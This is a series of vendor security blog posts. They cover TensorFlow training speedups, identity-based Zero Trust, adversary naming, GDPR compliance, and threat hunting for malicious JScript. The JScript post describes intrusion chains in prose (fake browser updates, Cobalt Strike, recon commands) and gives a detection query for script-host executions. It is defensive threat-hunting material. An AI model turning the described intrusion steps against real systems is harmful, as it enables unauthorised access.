With the P3 instance configured properly, it’s a matter of copying the dataset and the same TensorFlow code executed on the Mac laptop onto the P3 instance and running the full model training pipeline on a Docker container. Results show a large improvement in total training time, from 163 hours down to 44 hours, as the TensorFlow code accelerates model training by running on the GPU-enabled P3 instance.

Trained On Training Dataset Total Training Epochs Total Training Time
p3.8xlarge 1.9 million text files 65 44 hours

Prefetching and Caching for Optimized TensorFlow Data Performance

In addition to speeding up training by running on a GPU, TensorFlow provides configuration options that can help build more efficient data pipelines as part of the model training process. The tf.data API provides two important methods that can be used to make sure I/O does not become a bottleneck during model training: prefetch and cache.

Prefetching overlaps data preprocessing and model execution while training. Specifically, while a model executes training at the current step, the input pipeline reads the data for the next step. The prefetch transformation reduces total training time by taking advantage of opportunities to do overlapping work.

Figure 6. Prefetching data performance (Source: https://www.tensorflow.org/guide/data_performance#prefetching)

Caching keeps data in memory after it’s loaded off disk. This ensures the dataset does not become a bottleneck while training the model. It is important to note that for caching to work optimally in TensorFlow, the total CPU memory of the computer should be larger than the total size of the training dataset.

Figure 7. Caching data performance (Source: https://www.tensorflow.org/guide/data_performance#caching)

It is simple to update TensorFlow code to use these methods within the tf.data API:

train_dataset = train_dataset.cache().prefetch(buffer_size=tf.data.AUTOTUNE)

Note: The optimal number of elements to prefetch() should be greater than or equal to the number of batches consumed by a single training step. TensorFlow tf.data API provides a tf.data.AUTOTUNE flag that can be used to tune the prefetch value dynamically at runtime.

After applying these changes and retraining the model, results show another large improvement in training time, from 44 hours down to 6 hours.

Trained On Training Dataset Total Training Epochs Total Training Time First Epoch Training Time Average Training Time per Epoch (2-65) 
p3.8xlarge 1.9 million text files 65 6 hours 40 minutes  5 minutes

Notice that every epoch after the first is extremely fast. This is due to caching. During the first epoch, the entire training dataset is loaded into CPU memory, and feature extraction is performed on the data. For all subsequent epochs, the GPU immediately runs on the training steps on the already processed data (feature vector).

Parallel Model Training

In addition to having a large amount of CPU memory, a major advantage of running on the p3.8xlarge instance is that it has four GPUs. With multiple GPUs on the instance, model training runs in parallel, with each run having a different set of hyperparameters. This reduces overall model development process time by enabling multiple models to be trained in the same six-hour window instead of having to wait for each model training run to complete before launching the next.

Figure 8. Simplified view of parallel model training across multiple GPUs. The same CPU memory is shared by every model training container. Note that only three of the four instance GPUs are used. This is due to constraints on the instance’s total amount of CPU memory available for caching relative to the size of our training dataset.

Training Speed Improvements: The Journey in Numbers

Figure 9 is a plot showing the time needed to fully train a single model compared across the incremental improvement made to the training workflow:

Figure 9. Note that Parallel Model Training is not included in this plot, as it does not affect a single model’s training time, even though it improves total model development time by allowing for multiple runs in parallel.

We can see a significant drop in training time for every improvement made on the journey to a faster model training pipeline.

Conclusion

The steps taken to achieve faster model training for the TensorFlow model are:

  • Replacing Python feature extraction code with Rust
  • Using an AWS EC2 P3 instance with Docker to accelerate model training on GPUs
  • Adding caching and prefetching to our TensorFlow code
  • Running multiple model training runs in parallel, leveraging the multiple GPUs available on a p3.8xlarge instance

This journey to faster model training provides a template for accelerated training on any new TensorFlow model developments moving forward.

With the model trained and tested, it is now ready for the production pipeline. CrowdStrike has developed tools for converting TensorFlow models into Rust, enabling our models to be safely used with fast inference time and small memory footprint within the CrowdStrike Falcon sensor environment. 

For more information on how CrowdStrike combines the benefits of TensorFlow model training with Rust for model inference, see Building on the Shoulders of Giants: Combining TensorFlow and Rust and Development Cost of Porting TensorFlow Models to Pure Rust.

Special thanks to CrowdStrike Senior Rust Software Engineer Joey Hu who assisted with article draft review and Rust feature extraction work.

References

TensorFlow, the TensorFlow logo and any related marks are trademarks of Google Inc.

Additional Resources

CrowdStrike Falcon Identity Threat Protection Added to GovCloud-1 to Help Meet Government Mandates for Identity Security and Zero Trust

1 June 2022 at 07:15

CrowdStrike recently announced the addition of Falcon Identity Threat Protection and Falcon Identity Threat Detection to its GovCloud-1 environment, making both available to U.S. public sector organizations that require Federal Risk and Authorization Management Program (FedRAMP) Moderate or Impact Level 4 (IL-4) authorization. This includes U.S. federal agencies, U.S. state and local governments and the Defense Industrial Base (DIB).

On May 12, 2021, the White House released an Executive Order (EO) on Improving the Nation’s Cybersecurity to offer guidance on security best practices including how the federal government must advance toward a Zero Trust Architecture to keep pace with today’s dynamic and increasingly sophisticated cyber threat environment.

CrowdStrike believes Zero Trust principles and identity protection must be applied properly to both hybrid and multi-cloud environments. Identity protection must be all-encompassing and contextually aware of a customer’s on-premises and cloud environments, as well as other identity providers. Lacking visibility in part of the architecture or part of the authentication flow can lead to breaches.

Falcon Identity Threat Detection is CrowdStrike’s solution for detecting identity-based attacks with zero dependency on logs. Extending that solution, Falcon Identity Threat Protection helps detect and prevent identity-based solutions in real time. In addition, Falcon Identity Threat Protection integrates with the top identity directories, including Active Directory, enabling customers to enforce multifactor authentication (MFA) and empowering them to apply the same MFA to on-premises authentication flows — and those who wish can have multiple identity providers. If Falcon Identity Threat Protection identifies a compromised identity, it can prevent that identity from authenticating and accessing other resources both on-premises or in the cloud.

For the remainder of this blog, we focus on Falcon Identity Threat Protection, which has proven to be so effective at stopping breaches and preventing lateral movement that in the recent Round 4 of the MITRE Engenuity ATT&CK® Enterprise Evaluation, CrowdStrike was asked to disable our identity protection capabilities so that MITRE could continue testing the other modules of the CrowdStrike Falcon® platform.

This blog is the first in a four-part series to show how Falcon Identity Threat Protection can help federal government agencies fulfill cybersecurity requirements set forth in the cybersecurity EO. This blog series will illustrate how Falcon Identity Threat Protection can:

  • Help with your Zero Trust journey, including for both on-premises and cloud use cases (this blog)
  • Secure all logon types — including previously impossible ones to force MFA or smart card authentication — to significantly boost the ROI of your MFA provider and remove blind spots (Part 2) 
  • Enforce credential segmentation, greatly reducing the exposure of highly privileged accounts to less trusted devices (Part 3)
  • Protect against supply-chain attacks such as SUNBURST for all logon types (Part 4)

The White House Executive Order and Zero Trust Security

The White House issued the cybersecurity EO in the wake of high-profile cyber incidents including the SUNBURST supply-chain and Colonial Pipeline (DarkSide) ransomware attacks. The EO outlines a number of steps intended to strengthen cybersecurity posture at a national level, including:

  • Modernizing federal government cybersecurity
  • Enhancing software supply chain security
  • Improving detection of cybersecurity vulnerabilities and incidents on federal government networks
  • Improving the federal government’s investigative and remediation capabilities

In addition to mandating that federal agencies implement endpoint detection and response (EDR), the EO requires that Zero Trust security principles be followed — something that was emphasized especially due to federal departments and agencies’ continued push to adopt cloud technologies. 

It can be nearly impossible to apply Zero Trust principles across on-premises Active Directory and cloud environments, across multiple identity providers. Consider some of the questions that CrowdStrike had to address in architecting Falcon Identity Threat Protection: 

  • If users can authenticate against Azure AD, Okta, Ping or on-premises Active Directory, how do our customers secure all of those authentication points? 
  • How do our customers provide the same level of security for on-premises authentication (e.g., Kerberos, NTLM) as they do for cloud authentication that can enforce MFA? This includes service accounts, which are often ignored.
  • How do we apply MFA on things, such as remote PowerShell, that leverage non-interactive logon — and why is that such a big deal? 
  • How do our customers ensure that, if they detect suspicious activity in one of those authorization points or see the identity be compromised, all of the other identity providers are made aware and modify how they treat that respective account? 
  • How do our customers segment highly privileged accounts so they can only be exposed to not just specific machines, but to machines that are assessed continuously for device hygiene? 

Left unaddressed, these scenarios can cause blind spots that can lead to the activity seen in the SUNBURST attack, where the attacker predominantly compromised on-premises credentials, in many cases bypassing MFA to take over entire cloud infrastructures — and leading to devastating consequences.

We will explore each of these questions in subsequent blogs and explain how they are addressed by Falcon Identity Threat Protection. But first, let’s view the bigger picture in this blog.

The U.S. Department of Defense’s Seven Pillars of Zero Trust

Following the issuance of the EO, the federal government has been actively developing reference architectures to guide implementation of its mandates. For example, the National Institute of Standards and Technology (NIST) released SP 800-207, which discusses various Zero Trust Architecture (ZTA) policy enforcement and policy decision points and has effectively become the foundation for other reference architectures. In addition, the National Security Agency (NSA) released a Zero Trust Maturity Model to help identify the various maturity levels of implementing Zero Trust. 

The U.S. Department of Defense (DoD) released its Zero Trust reference architecture, which differs from the NIST and NSA architectures in that it discusses common Zero Trust use cases across seven “pillars”: User; Device; Network/Environment; Application and Workload; Data; Visibility and Analytics; and Automation and Orchestration (see Figure 1). We will examine how identity protection plays a role in each pillar of this particular architecture.

Figure 1. The DoD’s Seven Pillars of Zero Trust (Click to enlarge)

It is commonly believed that identity affects only one of the pillars described in this architecture, that of the user. In reality, identity applies to all seven pillars as follows:

  • User. Each user has an identity, which typically exists in multiple places (e.g., on devices, in Active Directory, in the cloud). It’s important to remember that a user can normally authenticate at multiple places, whether on premises or to cloud services or another identity provider.
  • Device. Devices not only have their own identities, but they are exposed to the identities and other credentials of users that access them. As a result, if a device is compromised, the credentials on that device are also exposed as long as the adversary has access to it.
  • Network/Environment. Network devices typically are accessible by service accounts having appropriate privileges. If service accounts are ignored in a defense posture — similar to what happened in the SUNBURST attack — blind spots are created that could lead to significant breaches.
  • Application and Workload. Applications and workloads depend on users being authenticated to give them respective privileges — and with the continuous integration/continuous development (CI/CD) that modern applications have today to enable DevOps and DevSecOps practices, if an identity token is compromised that has privileges to push code to a CI/CD pipeline, it could be possible for an adversary to make production-level changes.
  • Data. To be fully protected, data must be more than cataloged and tagged appropriately. Users must be able to authenticate appropriately for authorized access to such data. Not only that, data protection can also include only enabling certain applications to access that data, and when implemented, should be executed at the process level. And for processes to be trusted, the operating system and device itself must also be trusted to some degree.
  • Visibility and Analytics. Visibility and analytics are used to assess identity across all of these pillars, looking for anomalous activity. In addition, users who wish to access this data also must be able to authenticate at some level, thus requiring identity protection for data access at this layer.
  • Automation and Orchestration. Automation and orchestration helps defenders use, proactively if possible, the learned visibility and analytics via API webhooks — API webhooks which require authentication tokens, mapped to an identity, giving it the right permissions to execute. A compromise against one of those tokens can have a devastating impact in an environment.

Through the lens of the DoD’s Seven Pillars of Zero Trust, let’s consider two scenarios that include multiple decision and enforcement points and how and where Falcon Identity Threat Protection fits in. The first shows user authentication against an on-premises resource, leveraging “legacy” authentication protocols, while the second focuses on authentication against a cloud resource, or at minimum a resource behind a cloud-based identity provider. (We will dive deeper into some of these concepts in subsequent blogs, showing, for example, how CrowdStrike secures “legacy” authentication protocols.)

Zero Trust for an On-Premises Resource

Figure 2 depicts a user-access flow of a device accessing an on-premises resource, using CrowdStrike technology.

Figure 2. Falcon Identity Threat Protection helps continuously monitor and secure identity, including for legacy authentication protocols such as NTLM and Kerberos, without ever touching the application (Click to enlarge)

In the example shown in Figure 2, the Falcon platform’s endpoint protection helps create a device hygiene score called the “Zero Trust Assessment” score. When a user from a protected device attempts to authenticate or access another system, that authentication continues to occur against on-premises Active Directory as usual. However, Falcon Identity Threat Protection can detect against discrete attacks (e.g., Pass-the-Hash, Overpass-the-Hash, Forged PAC, Golden Ticket) and also measure against the learned baseline of that credential’s normal activity while also assigning a risk score to the credential.

That risk score can potentially modify how the credential can successfully authenticate and potentially enforce MFA — all before the user is allowed to authenticate. 

Just with the device hygiene score and user-risk score, Falcon Identity Threat Protection solves two of the biggest problems with MFA: It usually has no context of the device itself, and MFA usually isn’t possible for on-premises authentication and certainly is never possible with non-interactive logons (e.g., remote PowerShell, Windows Management Instrumentation). 

Solving these two problems alone is a huge step forward in securing identity. Smart card authentication has never been applicable to non-interactive logons — in fact, the enforcement policy on Windows is literally called “Smart Card Required for Interactive Logon.” This means if the adversary ever compromised an account and performed non-interactive logon via that account (for example, PowerShell), most security solutions would be blind to this attack, and it would completely bypass PKI smart card controls. Instead of disabling PowerShell — which the adversary can quickly re-enable via various methods — we could gain more control and visibility of these often-ignored logon types, in this case non-interactive or what we call “programmatic.” 

Let’s also consider the significant cost savings. Falcon Identity Threat Protection enables the on-premises application of Zero Trust principles to identity, including the context of the source device and applying MFA to all logon types — thereby drastically increasing the ROI on your MFA provider.

The scenario depicted in Figure 2 includes the addition of a barrier between the device and Active Directory via a secure access service edge (SASE). This is explored further in the next example, when a user authenticates against a cloud resource.

Zero Trust for the Cloud

Figure 3 depicts a user-access flow example, this time with a device gaining access to a cloud resource.

Figure 3. CrowdStrike Falcon’s endpoint protection helps secure and measure the device. The device hygiene is shared across vendors, including the SASE vendor and the identity provider — in this case, Okta. If this was targeting an on-premises resource, CrowdStrike Falcon Identity Threat Protection can also tailor the workflow for on-premises, at authentication time. (Click to enlarge)

Very similar to the authentication flow of on-premises resources, the authentication flow to a cloud resource provides the ability to have context of the device and the user’s risk score throughout multiple parts of the architecture.

The SASE vendor can use the Zero Trust Assessment score from CrowdStrike to see if the device is managed and if it has the right level of trust. It can then pass the authentication flow to the identity provider, in this case Okta, which can also leverage the Zero Trust Assessment score for its decision making. However, the identity provider can also integrate with Falcon Identity Threat Protection in cases where risky on-premises users can result in different behavior or policy in the cloud; for example, perhaps you want users who are acting anonymously to be forced to use MFA when they attempt to access a cloud resource. Falcon Identity Threat Protection can do that, integrating with Microsoft Active Directory, Microsoft Active Directory Federation Services (AD FS), Okta, PingFederate and many other identity services. This solves one of the biggest challenges of securing the cloud: The cloud identity provider is traditionally open to the internet. By placing a SASE in front of the identity provider, and by ensuring the SASE vendor is made aware of the source computer’s device hygiene, we can drastically lower the exposure of our identity provider — no more external brute force attacks.

Falcon Identity Threat Protection also solves the big issue of identity providers in the cloud possibly having no idea what is happening on premises. Do we have evidence that the user was compromised on premises, and therefore we should disable authentication or force MFA when they next attempt to access a resource? Thanks to Falcon Identity Threat Protection’s integration with cloud identity providers, this is no longer an issue. In addition, user activity can be seen across multiple identity planes, such as Azure Active Directory (Azure AD). This helps secure the account and enables the execution of a timely incident response investigation.

Conclusion

Thanks to Falcon Identity Threat Protection being available in GovCloud-1, this is available to our federal customers and Defense Industrial Base (DIB) customers.

Sharing context across multiple parts of the Computer Network Defense (CND) is important to enable many of these use cases. Gone are the days when we assumed we had limited visibility of our own on-premises identity planes. Gone are the days when we didn’t fuse users’ activity across multiple identity providers where that user exists. Through Falcon Identity Threat Protection we can detect identity-based attacks, measure their respective risk score, and measure all-up identity hygiene, while being aware of other factors in our decision logic such as source and destination of the device and so forth.

In the following weeks, more blogs will drill into a lot of this content, doubling down on why it’s important from a risk and threat perspective.

Additional Resources

Naming Adversaries and Why It Matters to Your Security Team

31 May 2022 at 17:47

What is it with these funny adversary names such as FANCY BEAR, WIZARD SPIDER and DEADEYE JACKAL? You read about them in the media and see them on CrowdStrike T-shirts and referenced by MITRE in the ATT&CK framework. 

Why are they so important to cyber defenders? How is an adversary born? 

You may think you have a problem with ransomware, bots or distributed denial of service (DDoS) attacks but you would be wrong. Because humans are behind every cyberattack, what you really have is an adversary problem. Understanding the adversaries most likely to target your business is critical because it helps you focus your resources and better prepare your defenses to defeat them. 

CrowdStrike currently tracks and profiles over 180 adversaries, having added 21 new adversaries in 2021 alone. So let’s dive into the world of adversaries and understand why attribution and an adversary-focused approach to cybersecurity is crucial to defending against modern cyberattacks.

Attribution 101: What’s in a name?

Every adversary is motivated by a specific objective whether it is financial, espionage or political gain. CrowdStrike uses a two-part cryptonym so adversaries can be easily identified based on these three critical motivating factors: 

  • SPIDERs are cybercriminals motivated by monetary gain 
  • Nation-states perform espionage and are identified by their country of origins’ national animal such as BEAR (Russia) or PANDA (China) 
  • Hacktivists, looking to create political disruption, are JACKALS

The honor of providing the name used for the first part of the cryptonym goes to the CrowdStrike threat intelligence analyst or team who attributed the activity to a specific threat actor or group. While this part of the name may be arbitrary, CrowdStrike analysts are typically influenced by prominent tools and techniques they have observed being used by the actor. 

Identifying Activity Clusters

As you have probably guessed, observing related activity or “activity clusters” is a crucial aspect of CrowdStrike’s threat research that helps determine attribution.

The first step in identifying an activity cluster is to collect the right data in order to expose illicit actions. Only CrowdStrike has access to the trillions of events per day collected by the CrowdStrike Falcon® platform, which protects millions of endpoints across the globe and provides visibility into real-time and zero-day attacks. 

In addition, CrowdStrike Intelligence collects raw intelligence from several other sources including incident response engagements, millions of malware samples processed per day, the deep and dark webs, underground communities, social media, open source and much more. This is where CrowdStrike has a distinct advantage, confirmed by having the highest score across all vendors in the Forrester Wave™ External Threat Intelligence Services, Q1 2021 for the criteria “raw intelligence collection.”

The second step is analyzing this data using machine-based analytics as well as human intelligence analysts. CrowdStrike Intelligence analysts are organized into cells of cyber threat expertise such as adversarial pursuit, tactical malware analysis,  geopolitics, threat campaign analysis and others. CrowdStrike produces comprehensive threat insights across multiple dimensions such as attack motivation, techniques, and threat operations tactics. 

Activity clusters are typically based on one or more related technical attack techniques, tools or infrastructure that are leveraged by the adversary. For nation-state sponsored adversaries, CrowdStrike’s intelligence analysts overlay an understanding of the geopolitical-nexus of all observed activities to raise the confidence level from a cluster to a named state-sponsored adversary. The process is slightly different for cybercrime, where intel analysts focus on adversarial tooling, tradecraft and infrastructure, with careful emphasis on actor threat operations such as usage of “as-a-service” frameworks, shared infrastructure or inclusion of public commodity tooling during the attack steps.

Maintaining Rigorous Naming Standards

CrowdStrike has defined rigid analytic integrity standards that are routinely reinforced among the analytic cadre. All intelligence analysts are trained to ensure proper use of estimative language, bias awareness and elimination, and on using analytic tools such as “alternative competing hypotheses.” 

Throughout the attribution process, integrity is maintained through an extended judicious review among the different CrowdStrike teams holding threat expertise. Only after a series of rigid analytic steps will an actor be given a name and added to CrowdStrike’s list of named adversaries.

How Defenders Benefit from an Adversary-Focused Approach

Adversary attribution enables defenders to understand the “who, how and why” behind the cyberattacks targeting their business. By understanding their adversaries’ motivation, tools and tactics, defenders can apply proactive and preventative actions. 

For instance, targeted attacks may be driven by espionage, which indicates the threat will most likely be persistent and comprise multiple sophisticated attacks that can be expected to attempt to gain access to your sensitive company data. Knowing this about the espionage-motivated adversary provides guidance on where to place defensive “shields-up” measures and how you can best prepare. This could include proactively patching vulnerabilities or blocking file hashes or IP addresses at the perimeter, defensive tactics based upon attack vendors the adversary is known to have used in the past. Attribution enables security teams to understand their true risk posture by defining who could come after them and how, and preemptively adjust their security strategy. 

Adversary attribution also enables security teams to reduce noise by filtering an overload of security data to focus on specific tactics. The CrowdStrike Intelligence team’s profiling of over 180 global threat actors across cybercrime, nation-state and hacktivist adversaries enables you to search for just those actors most likely to attack your organization. A good place to start is to filter security data according to adversaries’ preferred targets, typically by industry and geographic region. Security analysts can focus on this much smaller subset instead of focusing on lower-risk, commodity attacks that are blocked by the security controls they have in place. 

In addition, once a known, sophisticated adversary has been spotted inside your organization’s infrastructure, alert levels can be raised, shields-up declared, and the available intel on the adversary can drive the threat hunting process to find and expel the adversary. Without this knowledge, security operations center (SOC) analysts waste time and resources, playing “whack a mole” in chasing every commodity attack or being blind to adversary activity that may be seen as normal activity without the context provided by threat intelligence.

While attribution provides the information that helps security teams prepare, there is additional intrinsic value in taking an adversary-focused approach to security. Attribution enables the entire team — proactive and reactive defenders alike — to orient their actions toward specific actors that target the organization, create their behaviors and tools, and begin to communicate across all teams with a common language including the adversary’s name, attack steps and point of view. This approach helps teams step away from tool- or process-heavy tactics and build strategies to increase the effectiveness of their security efforts.

In addition, security organizations are often split into operational silos, with each silo focusing on specific detection or protective tools. This structure with attention to “tools in use” and “small-team objectives” is not always advantageous. Focusing instead at a higher level — fighting the adversaries that are trying to breach your defenses — changes the dynamics for the entire team and starts with knowing the adversary, which benefits the individual security practitioner as well as the entire organization. 

Additional Resources

Four Takeaways as the European Union’s General Data Protection Regulation (GDPR) Turns 4

27 May 2022 at 18:44

This blog was originally published on Security Senses.

May 25, 2022, marked four years since the European Union’s General Data Protection Regulation (GDPR) went into effect. Although the scope of the law is limited to personal data originating from activities in the European Economic Area, the ensuing requirements have had a global impact. This is evident in similar laws that have been proposed or passed and measures multinational organizations have taken to comply with privacy requirements. In parallel, there has been a convergence of a principles-based approach to cybersecurity in many jurisdictions worldwide.

In light of the trends of the past four years, there are four clear takeaways for organizations seeking to meet their GDPR obligations.

1. GDPR Is not a Static Set of Requirements

During the past four years, organizations around the globe have adapted to comply with GDPR requirements, while those requirements and the threats posed to privacy have been anything but static. The European Data Protection Board (EDPB), the GDPR-era successor to the Article 29 Working Party, has issued updated guidance on a variety of areas. These include privacy-by-design guidelines as well as breach notification examples and response guidelines. Simultaneously, as shown in the CrowdStrike 2022 Global Threat Report, threats to data protection continue to evolve, requiring organizations to assess their GDPR compliance programs in the context of today’s security risks and GDPR requirements, rather than those of 2018.

2. Achieving Security-by-Design and Privacy-by-Design Is Not “Set and Forget”

As a principles-based regulation, GDPR includes obligations to incorporate privacy-by-design and to implement safeguards appropriate to the risk. EDPB guidelines make clear that privacy-by-design is an evolving standard that imposes on organizations a duty “to take account of the current progress in technology that is available in the market.” Furthermore, the EDPB guidance drives home the point that organizations may find themselves in violation of GDPR Arts. 25 and 32, where “a measure that once provided an adequate level of protection no longer does.”

This evolving standard of GDPR is a reflection of why security approaches, such as legacy antivirus, are mismatched for today’s realities. As workloads and data storage increasingly move from traditional endpoints to cloud offerings, cyber threat actors have expanded their targets. In fact, cyber threat actors often do not discriminate between personal or general, on-premise enterprise environments versus cloud environments. They target resources and data wherever they exist, and frequently move between local and cloud environments in an attempt to achieve their objectives.1 This is one reason why accidental data exposures that happen through, for example, misconfigured cloud storage environments are also increasingly a source of potential privacy issues. Moreover, threat actors use cloud hosting to disguise their intrusions as benign network traffic, and a variety of legitimate software and cloud hosting services to access company networks.

3. Mitigating Risk Can Mitigate Breach Obligations

Like many breach notification obligations, GDPR’s language is designed to reduce breach fatigue by creating an impact-driven duty to notify regulators and, in the most severe of instances, individuals. Recent guidance for the EDPB makes clear not all breaches have the same level of severity. For example, an incident where a threat actor sees a list of user names might have a small or negligible impact on affected parties. Whereas, another incident in which a threat actor exfiltrates complete financial or medical records may have a severe impact.

Some personal data may be considered benign enough that it would not even be considered reportable if a breach was to occur. Whereas, other personal data could pose a risk or high risk to the fundamental rights of data subjects. Such guidance is relevant for cross border data flows as well. Put simply, if certain types of personal data in a data breach would not be reportable, it raises the question as to whether there should be any barriers to data flows in a transfer impact assessment.

As a practical matter, the data breach guidance repeatedly endorses the notion of using centralized logs as a critical component in breach prevention and assessment. This is because security teams demand contextual awareness and visibility from across their entire environments, including within cloud and ephemeral environments. Log management is critical to understanding what happened. Going beyond this, extended detection and response (XDR), can be leveraged to apply order to a sometimes chaotic array of security tools by deriving actionable insights wherever they exist within the enterprise, and generate intelligence from what otherwise may be an information overload. Holistic XDR unifies detection and response across the entire security stack. 

4. Threats to Data Protection Aren’t Going Away

Legal guidance related to GDPR is not the only thing that has evolved in the past four years. The threats to privacy that GDPR principles require organizations to protect against have evolved as well. As CrowdStrike’s Global Threat Report highlighted, cyber actors pose a significant threat to organizations and, especially, to data protection compliance. In fact, CrowdStrike observed an 82% increase in ransomware data leaks from 2020 to 2021 alone. Moreover, there is the stark reality that 62% of attacks observed by CrowdStrike did not involve malware but instead were conducted via hands-on-keyboard activity. These realities make clear that using legacy antivirus technologies to protect personal data do not meet GDPR’s standards of implementing state-of-the-art security measures appropriate for today’s risks.

The Future of GDPR

Organizations subject to GDPR should evaluate whether measures put in place four years ago are still sufficient today. Both the legal guidance interpreting GDPR as well as the threats to privacy continue to evolve, and compliance is a moving target. Moreover, there have been significant fines under both GDPR and UK GDPR against organizations that do not implement appropriate safeguards to protect personal data. Consequently, as a practical matter, investing in ENISA endorsed security measures such as XDR, zero trust, log management and threat hunting is a fundamental part of compliance today.

Drew Bagley is Vice President and Counsel, Privacy and Cyber Policy at CrowdStrike.

Endnotes

  1. George Kurtz, Testimony on Cybersecurity and Supply Chain Threats, Senate Select Committee on Intelligence (Feb. 23, 2021).

Additional Resources

How Defenders Can Hunt for Malicious JScript Executions: A Perspective from OverWatch Elite

An adversary’s ability to live off the land — relying on the operating system’s built-in tooling and user-installed legitimate software rather than tooling that must be brought in — may allow them to navigate through a victim organization’s network relatively undetected. CrowdStrike Falcon OverWatch™ threat hunters are acutely aware of adversaries’ love of these living off the land binaries (LOLBins) and build their hunts accordingly. In recent months, OverWatch Elite, a part of CrowdStrike’s Falcon OverWatch managed threat hunting service, has seen an increase in the use of JScript in hands-on-keyboard intrusions. 

JScript vs JavaScript

JScript is a Microsoft-dialect of standard JavaScript, a scripting language that can be used in a web browser setting to add custom functionality to web pages. JScript, however, is an Active Scripting language, meaning it is more integrated into the operating system. JScript can be executed as a standalone file. It is often used to write files to disk, make registry changes, make network connections, execute commands and more. 

While JScript and JavaScript are distinct scripting mechanisms, they both use the same file extension: .js. By default, double-clicking on a .js file in Windows Explorer will cause it to open the file with Windows Script Host executable wscript.exe, which will execute the code. Because wscript.exe is signed by Microsoft and is included in every Windows installation, it is often considered trusted by more traditional security solutions. Although when a .js file is downloaded from the internet an extra warning dialog is displayed prior to execution, our telemetry shows that this does not stop users from proceeding with the execution. 

The relative ease with which .js files can be opened provides attackers with an attractive initial access vector, as tricking a user into executing their malicious scripts can be easy. Moreover, the limited logging that is provided by Windows Script Host (WSH) allows adversaries using malicious JScript files to evade some defense mechanisms and go unnoticed for longer.

Figure 1: A proof-of-concept JScript execution that upon double clicking spawns calc.exe. (Click to enlarge)

JScript as an Entry Point for Hands-on-Keyboard Activity

Unsurprisingly, OverWatch threat hunters regularly see intrusions that involve, or even start with, malicious JScript executions. In the first quarter of 2022, OverWatch identified several Fake Browser Update (FBU) infections — two of which led to the delivery of Cobalt Strike beacons followed by hands-on-keyboard activity. The actor likely used hijacked WordPress websites to host fake warnings about outdated browsers or plugins, asking the user to click a button to download the latest version. A malicious .js payload was then packed in a .zip archive, which the user was lured into opening by giving it names such as ChromeUpdate.js. This file connected to a command-and-control (C2) channel, executing various reconnaissance commands (e.g., leveraging whoami, net, nltest and cmdkey) before dropping and running a Cobalt Strike beacon. The actor was then observed using this beacon for hands-on-keyboard activity. 

In another instance, OverWatch observed the use of malicious .js files in financial services-themed phishing lures. The victim organization was sent an email with a .zip file containing  a file called agreement.js. Upon opening, the JScript file reached out to an attacker-controlled domain, setting up a PowerShell implant that allowed the actor to perform further hands-on-keyboard activity. This activity included creating persistence, running various discovery commands and executing BloodHound. OverWatch quickly alerted the victim organization about the malicious activity, enabling them to contain the affected machines.

Detecting and Preventing Malicious JScript Executions in Your Environment

Because of how JScript works, there is not a straightforward way to detect malicious executions. While JScript is considered a legacy technology, it is still relied upon by a vast array of software and admin automation solutions. This can make distinguishing benign behavior from potentially malicious behavior challenging.

As seen in the examples above, to abuse JScript for initial access means, the attacker need only convince a user to open a malicious .js file, which is often provided to the user in an archive file. One approach for hunting in your environment for this malicious needle in your environment’s haystack is to hunt for JScript executions that originate from a user’s download folder or temporary archive locations (e.g., ZIP, RAR or 7Zip files). 

In the CrowdStrike Falcon® platform’s Event Search function, the following query will surface such executions:

event_simpleName=ProcessRollup2 FileName IN ("cscript.exe", "wscript.exe")
| search CommandLine = "*.js*" (CommandLine="*\\downloads\\*" OR (CommandLine="*\\Appdata\\Local\\Temp\\*" AND (CommandLine="*.zip\\*" OR CommandLine="*\\7z*" OR CommandLine="*\\Rar*")))
| rex field=CommandLine "(?i)(?<ArchiveType>\.zip\\\|\\\7z|\\\Rar)"
| eval ArchiveType=case(ArchiveType=".zip\\", "ZIP", ArchiveType="\\7z", "7Z", ArchiveType="\\Rar", "RAR")
| eval isFromArchive=if(ArchiveType!="","Yes", "No")
| eval isInDownloads=if(match(CommandLine, ".*\\\Downloads\\\.*"),"Yes", "No")
| eval ProcExplorer="https://falcon.crowdstrike.com/investigate/process-explorer/" .aid. "/" . TargetProcessId_decimal . "?_cid=" . cid
| convert ctime(_time)
| table _time aid ComputerName UserName isInDownloads isFromArchive ArchiveType FileName CommandLine ParentBaseFileName ProcExplorer
| sort + _time
| rename _time as Time, aid as "Falcon AID", ComputerName as Endpoint, isInDownloads as "In Downloads folder?", isFromArchive as "From Archive?", FileName as ProcessName, CommandLine as ProcessCommandLine, ParentBaseFileName as ParentProcessName, ProcExplorer as "Process Explorer Link"

The output generated by this hunting query may look something like this:

Figure 2: Sample output of the above Event Search query, surfacing suspicious JScript executions. (Click to enlarge)

A next step would be to use the Process Explorer Link to see the process execution and dive deeper into what actions were performed by the JScript file.

Figure 3: Falcon’s Process Explorer reveals the suspiciously-named invoice_2022-03-21.js spawned calc.exe. (Click to enlarge)

The above example shows the execution of calc.exe, which may be considered unusual in a given environment. This would provide for further hunting opportunities, such as analyzing unusual children spawned by wscript.exe. 

If the given hunting query produces too many results, it is possible to narrow the search further — for example, by limiting it to wscript.exe executions that involve spawning new processes, writing certain file types to disk, or manipulating sensitive registry locations.

From a prevention perspective, there are a few things that can be done. A key weakness in how JScript is set up in Windows is that double clicking a .js file quickly leads to execution. Removing the file association of .js files with wscript.exe may reduce the chances of success. Without the file association, a user would have to use the command line prompt to execute the file. Thus, an unsuspecting user double clicking a link in a phish would not result in a successful phish. Further, partially disabling JScript could reduce the attack surface. Microsoft also offers an option to completely disable Windows Script Host (although in most corporate environments this would not be a feasible option).

The Value of OverWatch Elite

Hunting for malicious .js executions can prove difficult due to high data volumes, legitimate use of JScript files and the variety of ways in which attackers can abuse JScript. To effectively defend against this requires deep knowledge of your environment, insights as to how attackers operate and experience with regards to detecting follow-on behavior. Managing this and other day-to-day responsibilities can easily overwhelm an in-house security team. 

OverWatch’s preeminent managed threat hunting service protects customer environments on a 24/7/365 basis. OverWatch’s primary mission is to pinpoint malicious activities at the earliest possible stage, providing customers with timely, high-fidelity and, most importantly, actionable notifications and context that inform a swift and decisive response.

OverWatch Elite builds on the 24/7/365 threat hunting operations provided as a part of OverWatch standard and includes additional services, such as: 60-minute call escalation for critical threats, quarterly threat briefings, tailored threat hunting and more. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

For more information, please visit the OverWatch Elite page on CrowdStrike’s website.

Additional Resources

❌